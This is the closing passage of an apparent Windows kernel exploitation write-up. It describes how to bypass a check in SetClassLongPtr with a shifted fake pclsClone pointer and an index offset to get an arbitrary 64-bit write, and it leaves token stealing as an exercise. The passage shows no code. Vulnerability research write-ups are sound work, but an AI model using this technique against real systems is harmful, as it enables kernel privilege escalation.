To satisfy the condition in SetClassLongPtr, we use our read primitive to check if the target address (VA-of-WriteTarget - 0xA0) points to a zeroed memory region. If it doesn’t, we adjust our fake pclsClone pointer backwards until we find an address that does point to zero. This avoids triggering the linked list loop inside SetClassLongPtr.

To compensate for the new offset, we use the second parameter of SetClassLongPtr, which acts as an index (value of index is local varaible with name offset at pseudocode above).

This index is add internally to calculate the final write offset, so it allows us to land exactly on the original target, even if the base pointer was shifted.

Write64 implementation

At the end we should not forget to recover original tagCLS pointer.

Conclusions

I hope I managed to explain the full exploitation process in a clear and structured way. If you have any questions, feel free to reach out — I’m happy to answer or discuss further.

We intentionally left out the final step — the actual token stealing implementation. It’s not very complicated, and if you’ve followed the write-up this far, consider it a practical exercise for the reader.